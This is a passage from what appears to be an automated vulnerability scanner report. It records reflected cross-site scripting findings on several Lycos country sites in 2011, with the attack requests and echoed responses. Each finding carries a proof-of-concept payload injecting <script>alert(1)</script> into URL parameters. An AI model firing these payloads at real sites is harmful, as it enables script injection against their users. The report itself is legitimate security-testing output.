HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/ Set-Cookie: LYCOS_SEARCH=nbn9glms4m2vil1o58s7d03gg2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multi4db38"><script>alert(1)</script>0bdbb3d2807&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
1.299. http://www.lycos.at/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.at
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e6bc"><script>alert(1)</script>617ee62cbd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?4e6bc"><script>alert(1)</script>617ee62cbd1=1 HTTP/1.1 Host: www.lycos.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161733398; path=/ Date: Mon, 07 Feb 2011 14:52:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:31 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?4e6bc"><script>alert(1)</script>617ee62cbd1=1&diktfc=89CB850B7B6CDECF10AF682AEDC184BAA8E73B509B27&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56e6"><script>alert(1)</script>8888e131586 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer HTTP/1.1 Host: www.lycos.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer&diktfc=6B2BA67E858B385A8827A328762C53997CC7E7ECACC4&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19993"><script>alert(1)</script>ecba6dbeeb4 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4 HTTP/1.1 Host: www.lycos.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839806000; path=/ Date: Mon, 07 Feb 2011 14:52:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4&diktfc=ABF98913624707CA12A71CD65C0023955CF8862236F0&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7650e"><script>alert(1)</script>91f57f72591 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839809267; path=/ Date: Mon, 07 Feb 2011 14:52:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer&diktfc=D06EED63D740C9F1A7C6CD2B58B3ACE95D4FCCDBEF77&mobile=1"> ...[SNIP]...
1.303. http://www.lycos.be/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.be
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ee9"><script>alert(1)</script>5cb537d5b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?c3ee9"><script>alert(1)</script>5cb537d5b45=1 HTTP/1.1 Host: www.lycos.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?c3ee9"><script>alert(1)</script>5cb537d5b45=1&diktfc=97E5EB835B279BB13FE34B032A5C9AC1EFCA968FE872&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a857c"><script>alert(1)</script>736e3f921fe was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer HTTP/1.1 Host: www.lycos.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839836492; path=/ Date: Mon, 07 Feb 2011 14:52:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer&diktfc=623DAA5AA63790B00C336C9EA20D19C6CCF52C9D1345&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e80"><script>alert(1)</script>e545848e758 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758 HTTP/1.1 Host: www.lycos.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:52:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:44 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758&diktfc=B40089EC36E5DAC56A7BB40F7A2916D2885AE607D69F&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00a2"><script>alert(1)</script>8120a6d457e was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839804911; path=/ Date: Mon, 07 Feb 2011 14:52:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer&diktfc=BBA1BC2FA21FEDA918DBB104CC41AFAF4F849834F42E&mobile=1"> ...[SNIP]...
1.307. http://www.lycos.ca/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.ca
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f7ab"><script>alert(1)</script>4d893273fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?2f7ab"><script>alert(1)</script>4d893273fa2=1 HTTP/1.1 Host: www.lycos.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839802733; path=/ Date: Mon, 07 Feb 2011 14:52:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?2f7ab"><script>alert(1)</script>4d893273fa2=1&diktfc=1E248AAB74BDC5BC1E11A5AD374A2D16BAC46F7949AD&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e58d"><script>alert(1)</script>7e69c306b0 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags8e58d"><script>alert(1)</script>7e69c306b0&utm_medium=footer HTTP/1.1 Host: www.lycos.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839838670; path=/ Date: Mon, 07 Feb 2011 14:52:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags8e58d"><script>alert(1)</script>7e69c306b0&utm_medium=footer&diktfc=C2159C702AB09E5C6B6B74688C2AFAD1967955EE45CB&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba95a"><script>alert(1)</script>1933e790fa5 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerba95a"><script>alert(1)</script>1933e790fa5 HTTP/1.1 Host: www.lycos.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:45 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerba95a"><script>alert(1)</script>1933e790fa5&diktfc=EB1D2415C70E36D67A6C192E9371867C679A398C10DE&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 557ac"><script>alert(1)</script>48d42846a50 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome557ac"><script>alert(1)</script>48d42846a50&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome557ac"><script>alert(1)</script>48d42846a50&utm_campaign=home_flags&utm_medium=footer&diktfc=72F4C9279F6192313E246BF9454B8594875FFAE86C73&mobile=1"> ...[SNIP]...
1.311. http://www.lycos.ch/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.ch
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fc4"><script>alert(1)</script>809d469f44a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?d2fc4"><script>alert(1)</script>809d469f44a=1 HTTP/1.1 Host: www.lycos.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:52:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?d2fc4"><script>alert(1)</script>809d469f44a=1&diktfc=03E80C6F267C68A1BD7EE28C75A612590AFC41CFD230&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48871"><script>alert(1)</script>545ed04f921 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags48871"><script>alert(1)</script>545ed04f921&utm_medium=footer HTTP/1.1 Host: www.lycos.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839838670; path=/ Date: Mon, 07 Feb 2011 14:52:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:40 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags48871"><script>alert(1)</script>545ed04f921&utm_medium=footer&diktfc=7F8D0A4C5D6941A17D7205C612DC394F05A688CE48E6&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e0b"><script>alert(1)</script>a098749212a was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footere8e0b"><script>alert(1)</script>a098749212a HTTP/1.1 Host: www.lycos.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161733398; path=/ Date: Mon, 07 Feb 2011 14:52:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footere8e0b"><script>alert(1)</script>a098749212a&diktfc=B377FBF11AB129B1C3C3E419CC1218101937FE7DA0A4&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9258c"><script>alert(1)</script>0ce03e91265 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome9258c"><script>alert(1)</script>0ce03e91265&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:35 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome9258c"><script>alert(1)</script>0ce03e91265&utm_campaign=home_flags&utm_medium=footer&diktfc=0706A76580E4FED498965162AA33F70BED09E9F7B2A8&mobile=1"> ...[SNIP]...
1.315. http://www.lycos.cl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.cl
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff53"><script>alert(1)</script>cd12f610c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?6ff53"><script>alert(1)</script>cd12f610c1e=1 HTTP/1.1 Host: www.lycos.cl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
